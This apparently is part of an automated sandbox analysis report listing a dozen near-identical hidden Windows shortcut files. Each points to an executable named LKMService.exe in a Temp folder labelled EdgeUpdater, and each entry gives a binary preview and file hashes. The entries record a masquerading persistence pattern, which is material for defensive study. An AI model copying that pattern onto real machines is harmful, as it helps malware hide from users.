                Preview:L..................F....".....X:3......^3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:34 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938750889038317
                Encrypted:false
                SSDEEP:24:8IERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8ICJD3lfAvRAt41vgHyg
                MD5:16EF18D930C99E048A749CD415956AF6
                SHA1:CE67C65DA063F2FD366B364DA963F440ECE5DCA1
                SHA-256:CEF2774B3FB4D034FE73B39580704D7868732A7D8C6EDAA46B01C4CA11E98F2B
                SHA-512:B891F218AE99AEED4D8E86290FF0E3D1943F2BDC3CD9425CBFFE685A3075006D95075F9ACFAADB91F28100613A65EDF041061D8F7D554F5B788278C7D2F14E10
                Malicious:false
                Preview:L..................F....".....X:3....H3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:32 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.93241605112979
                Encrypted:false
                SSDEEP:24:8uRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8oJD3lfAvRAt41vgHyg
                MD5:B4819230FEC02E6CE11EF0DCD51C6CCB
                SHA1:7086511763AF7AD77B4764485A6802737BFA9DF4
                SHA-256:333991E61BAAACF958B69801D24304434900B77D9429EF5D79371D874997A73D
                SHA-512:A6EB1437ED8B864841B363B42893F45798C269F2CBD734B6F09EBA84C0043A0BB2BBF1A4AEECACB156933AD8C524A7C70C404FA197A483638339208864C71584
                Malicious:false
                Preview:L..................F....".....X:3...K.KG3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:10 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940092326785315
                Encrypted:false
                SSDEEP:24:8GRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8QJD3lfAvRAt41vgHyg
                MD5:14C0956BDEA8CA41E37F4C543CD71171
                SHA1:A04227FA9B37A6D1876F0E611F5FF51BE1059E8A
                SHA-256:F1C57531532D81568202C1EB03A1C530E3713DC1B804D48FBB85FD6D2F3F30AF
                SHA-512:E7E0C3E9C48C2175FAC90ADF6C79E387A1BBFC60F1FA2398A210541D99A91723B5BAC7EE8EB4455295AD823BE514CE42339C36D29EB6675D7EB7A2B967480C07
                Malicious:false
                Preview:L..................F....".....X:3......]3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.933770967354062
                Encrypted:false
                SSDEEP:24:8TRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:81JD3lfAvRAt41vgHyg
                MD5:1C4C249472F5E4121293DFC9A4698BDE
                SHA1:E48B5DD43E1B2175C2D83789A4AC0386BFE63001
                SHA-256:48E370F005FE332B6526645F9A3A5D3E12CC8152FDFFC92C21CE182F2234D999
                SHA-512:C31F4B49DB0E0A2FFEF3E8714328A26C77FCC598008F13D9191C17F9BF49A1664CAFBA9D9478988C784E997A9BED1EB5FD3B236F73459AA179E273BD49E9069D
                Malicious:false
                Preview:L..................F....".....X:3....:3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:53 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940608469926803
                Encrypted:false
                SSDEEP:24:8uRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8oJD3lfAvRAt41vgHyg
                MD5:5DDFB2EAB155DAE04E55FBB1C5723381
                SHA1:BF8D1E84B43015246E510CD3D970466A12363B58
                SHA-256:AB55C98E15DAAB4E0CAA8A7F821EE434C53D340F1AA1F3D4E7DD5D41D4A03498
                SHA-512:C6AC45D86E0B44140DE45A4D3D9DFBB11F4EAA6AA89DA2CFB20068475A616721A06E301F24230B5C69CAB79A994B97E6237311A8AB72F2F775F8250E29D2DC8E
                Malicious:false
                Preview:L..................F....".....X:3...|..T3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:50 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.936962612329988
                Encrypted:false
                SSDEEP:24:8SRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8UJD3lfAvRAt41vgHyg
                MD5:6FC67136A5511DBC21969A1C8FD6C5B7
                SHA1:281368CE5839B380F99A47C25EF062153F49EA4A
                SHA-256:296C69B40F945CD1CA215B880B4B617F902104F68E50E62500C0435E7D62E787
                SHA-512:7ADB026C7F4D615D8655D86BE26512CCA8ECA561A30E10DB02C6A1E886475E2374379816499FCFAB53501A5342F449BB6A9D59AFD39DA2BEDE3CBC79891AE224
                Malicious:false
                Preview:L..................F....".....X:3.....2R3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:02 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937949647893768
                Encrypted:false
                SSDEEP:24:8TRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:81JD3lfAvRAt41vgHyg
                MD5:B22CCF6CE6B8FFAF8D4D3B01B7FD5C9F
                SHA1:CC969B9789B8106D20F8743E1F3392386FA0E766
                SHA-256:FE5B1241834328F6575D47B945001BFD0B73EDAD73D17A129FBB00121A3ADCA4
                SHA-512:2B0695FA1A7D8AA4D02B20B25D97BA8D02F39401F8D6D6165A2F48DB3336E309F5A3CF5BF72503803FBDA31962E062C089055030DFC36146A887994C8718FDCA
                Malicious:false
                Preview:L..................F....".....X:3....>.Y3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:16 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9381299708720015
                Encrypted:false
                SSDEEP:24:8PERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8PCJD3lfAvRAt41vgHyg
                MD5:DEF817AB6D09E63C7A5844FD007B4F50
                SHA1:35C251A228EAC11DCBA50F7E3A7315A48CC14860
                SHA-256:69B136A611768FC139EE7094A6F6BAF3B43D0531DA1B9220FF3352BBCF202DBA
                SHA-512:B4AE3A5EE674B22DA070600A35BD873E78FA2583E2B518E8D260804C95D109F19D98E2596A1F1A1306F31BAC6904CDFE10F3E20D4ECB1420418A83112C338E76
                Malicious:false
                Preview:L..................F....".....X:3...S`.=3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:25 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937792679648034
                Encrypted:false
                SSDEEP:24:88RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8KJD3lfAvRAt41vgHyg
                MD5:8E144DEE88BB6794847DBD1F5B8AD7D6
                SHA1:18360A040F49F3852264DC9F7730DB04556B3937
                SHA-256:4D5F7B5068036AB7C4BDA2B26EBCE6EDE2DBE92ED20218D10B8E203F04DDB364
                SHA-512:9C6B3274300413738CA37973A3D70F762BD19B68EF678A0D17FA50D625CF9B0614E7EB18872D610C19BD2FC5150CDF331DF44059134D6CB5B1DA5C514344A160
                Malicious:false
                Preview:L..................F....".....X:3......C3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:23 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938324763258287
                Encrypted:false
                SSDEEP:24:83+RRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8uPJD3lfAvRAt41vgHyg
                MD5:A898AD5B5135D8D74603C0995247412C
                SHA1:4979C1FF6D7D8982D68F1D600FF347BB7D20636A
                SHA-256:1771ED1B2A75D36A1C79DE0340D96DEB2961792674F524554602608AD6DC9ED6
                SHA-512:6B7B19857AF4C3CE4291F031850B00D9B99F808153471D26ED2A3E167D0F8B53EE13DBCADE4B78133C8BB45173C750AEB9C9A67997C38DD8340E6BA152DC81BE
                Malicious:false
                Preview:L..................F....".....X:3....{.B3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:44 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938737410561042
                Encrypted:false
                SSDEEP:24:8sRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:86JD3lfAvRAt41vgHyg
                MD5:4107C43803D0B4844B2E000CF2FC9F3D
                SHA1:AD13F3D4F5B5947B8826F5057B2857440685C852
                SHA-256:0E79C230A1F0B320A6ED009132F7B9F6526FBB03F43DBF2A8CD2C1DBC534952B
                SHA-512:142944BEA6F0DB19A20B3EF0D6F616D5E290384317496557141D0E51B1FA6A993ACAF1067F1A5ADDEDB0C0585E808382D199B2CF4C77871B417CDC73813D0D2B
                Malicious:false
                Preview:L..................F....".....X:3.....oN3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:18 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937702814545189
                Encrypted:false
                SSDEEP:24:8cRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8qJD3lfAvRAt41vgHyg
                MD5:D366765E795FA0E1BD7752097C4CF4CE
                SHA1:B3374301CEE8C01B41DE6886D41969D50BFD3651
                SHA-256:D72D2256DCD115E289ED11185CF1ECCA878124A5CF7060D856DF596C49E30328
                SHA-512:A5C3C4B6FF81D65BFA78E83E92013A7A384D7ACE403427253E05D94C85F19B1A9D184EE313FCFCFF960585B471075FA26600A820A5A82931BA02EF9A9C9F88A1
                Malicious:false
                Preview:L..................F....".....X:3.....>3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:46 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938924968243301
                Encrypted:false
                SSDEEP:24:8dOLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8d4JD3lfAvRAt41vgHyg
                MD5:D896D348123E40FB50AD72EC7ED5F633
                SHA1:B22717EA29E77F2C1F3BD4539329884511428511
                SHA-256:DCEF14CB8BC70603A37212CFCB70564FF8D70CABC7A38DF2195E509BB6131263
                SHA-512:CAF163FDEAFFD990105C770ED59E63272B61C0F098C9A487E19899DD1668623C84C71ECBF1F4FD52EAA05CFD592C8AD335D595539EF2051113D2ECAD36317C0D
                Malicious:false
                Preview:L..................F....".....X:3..."..O3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:48 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.936418481687168
                Encrypted:false
                SSDEEP:24:8XLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8tJD3lfAvRAt41vgHyg
                MD5:C7741D73B7EE0805DF863373F6349364
                SHA1:E632281F8E2C6ADD22A217DD3F9977AFA14E6E0B
                SHA-256:C42B037D4167989A0D2C44E6E4CB94493F2AE1076C555505200D17D602FE5AF0
                SHA-512:F80628D077B4497D0FB81B3D1FABF28C071FF654EF5930A58B29CDFAE89E72475DAAB4F1870079E48EB769216377DBA24787F98F3C0481EB7C9118769D59CB41
                Malicious:false
